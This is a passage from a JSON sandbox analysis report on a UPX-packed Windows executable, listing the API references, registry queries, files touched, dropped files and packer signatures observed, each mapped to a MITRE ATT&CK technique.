(Indicator: \"InterlockedIncrement\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"InterlockedDecrement\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"CreateThread\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"CreateEventW\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandleW\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetCurrentThreadId\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"SetEvent\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"LocalFree\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"ExitProcess\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"WaitForMultipleObjects\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"OpenEventW\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"lstrlenW\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"EnterCriticalSection\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"LeaveCriticalSection\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetModuleFileNameW\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"OutputDebugStringW\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"DispatchMessageW\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"TranslateMessage\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"LoadStringW\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"RtlUnwind\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"CoInitializeSecurity\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"CoInitializeEx\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"CoUninitialize\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"CoTaskMemFree\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"ProgIDFromCLSID\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"CoCreateInstance\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"CLSIDFromString\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"CommandLineToArgvW\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"RegCloseKey\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"RegQueryValueExW\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"HeapDestroy\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"HeapAlloc\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"HeapFree\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"HeapReAlloc\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"HeapSize\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetProcessHeap\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetVersionExA\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"InterlockedExchange\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"InterlockedCompareExchange\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetStartupInfoA\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"OutputDebugStringA\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"SetUnhandledExceptionFilter\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"QueryPerformanceCounter\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetTickCount\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcessId\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetSystemTimeAsFileTime\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"TerminateProcess\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"UnhandledExceptionFilter\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"FormatMessageW\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"LoadResource\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"FindResourceExW\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"FreeLibrary\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetProcAddress\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"CreateFileW\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetSystemDirectoryW\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryW\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetFullPathNameW\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetVersionExW\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetSystemWindowsDirectoryW\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandleExW\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetFileAttributesW\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"UnregisterClassA\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"RegOpenKeyExW\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"SetLastError\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryExW\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"MapViewOfFile\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"CreateFileMappingW\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetLocaleInfoW\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"UnmapViewOfFile\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetSystemDefaultUILanguage\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetUserDefaultUILanguage\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"SearchPathW\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"RtlAllocateHeap\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"RtlFreeHeap\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-206", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the command-line string for the current process (API string)", "description": "Found reference to API \"GetCommandLineW\" (Indicator: \"GetCommandLine\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"CommandLineToArgvW\" (Indicator: \"CommandLineToArgv\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetCommandLineW\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API \"CommandLineToArgvW\" (Indicator: \"CommandLineToArgv\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75CB0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-161", "type": 2, "relevance": 1, "name": "Contains ability to retrieve/modify process thread (API string)", "description": "Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\" was detected as \"UPX\" and name: \"Packer\"\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\" was detected as \"Turbo Linker\" and name: \"Linker\"\n \"DISMHOST.EXE.67A47DCC.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"DISMHOST.EXE.67A47DCC.bin\" was detected as \"Turbo Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-272", "type": 2, "relevance": 1, "name": "Contains ability to retrieve/open a process (API string)", "description": "Found reference to API \"GetProcessHeap\" (Indicator: \"GetProcessHeap\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetProcessHeap\" (Indicator: \"GetProcessHeap\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-79", "relevance": 1, "name": "Contains ability to dynamically determine API calls", "description": "Found GetProcAddress() and LoadLibraryA() in an import section (Source: 8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c)", "origin": "Static Parser", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"DISMHOST.EXE.67A47DCC.bin\" has flags like IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\" has an executable section named \"UPX0\"\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\" has an executable section named \"UPX1\"\n \"DISMHOST.EXE.67A47DCC.bin\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\" has an writable section named \"UPX0\"\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\" has an writable section named \"UPX1\"\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\" has an writable section named \"UPX2\"\n \"DISMHOST.EXE.67A47DCC.bin\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"DISMHOST.EXE.67A47DCC.bin\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"DISMHOST.EXE.67A47DCC.bin\" was detected as \"Visual C++ 2005 Release -> Microsoft\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" trying to access non-existent file \"C:\\atmlib.dll\"\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" trying to access non-existent file \"C:\\ATMLIB.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "string-310", "type": 2, "relevance": 1, "name": "Contains ability to load modules (API string)", "description": "Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"LoadLibraryExW\" (Indicator: \"LoadLibrary\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"LoadLibraryW\" (Indicator: \"LoadLibrary\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"LoadLibraryW\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API \"LoadLibraryExW\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" touched file \"C:\\Windows\\System32\\svrwsc.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"8E7CF6179094262B5088D5C00566541381676C1FF38525BE51857BB21EE97B6C\"; Value: \"\")\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" trying to touch file \"C:\\atmlib.dll\"\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" trying to touch file \"C:\\Windows\\system32\\atmlib.dll\"\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" trying to touch file \"C:\\Windows\\System32\\sechost.dll\"\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" trying to touch file \"C:\\ATMLIB.DLL\"\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" trying to touch file \"C:\\Windows\\System32\\atmlib.dll\"\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe\" trying to touch file \"C:\\Windows\\System32\\imm32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"dism.log\" has type \"Unicode text UTF-8 (with BOM) text with very long lines (312) with CRLF line terminators\"- [targetUID: 00000000-00003852]\n \"DISMHOST.EXE.67A47DCC.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00003852]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "summary-29", "type": 15, "relevance": 1, "name": "Shows ability to use execution guardrails", "description": "The analysis shows indicators which can be used as execution guardrails to ensure that payload only executes against intended targets/system. Matched sigs: Able to identify virtual environment by using user activity (API string)\n Matched sigs: Contains ability to delay execution by waiting for signal/timeout (API string)\n Matched sigs: Contains ability to retrieve the time elapsed since the system was started (API string)", "origin": "Indicator Combinations", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-318", "type": 2, "relevance": 1, "name": "Contains ability to load/free library (API string)", "description": "Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"LoadLibraryExW\" (Indicator: \"LoadLibrary\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"LoadLibraryW\" (Indicator: \"LoadLibrary\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API \"LoadLibraryW\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API \"LoadLibraryExW\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-226", "type": 2, "relevance": 1, "name": "Contains ability to delay execution by waiting for signal/timeout (API string)", "description": "Found reference to API \"QueryPerformanceCounter\" (Indicator: \"QueryPerformanceCounter\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"WaitForSingleObject\" (Indicator: \"WaitForSingleObject\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"WaitForMultipleObjects\" (Indicator: \"WaitForMultipleObjects\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTimeAsFileTime\"; File: 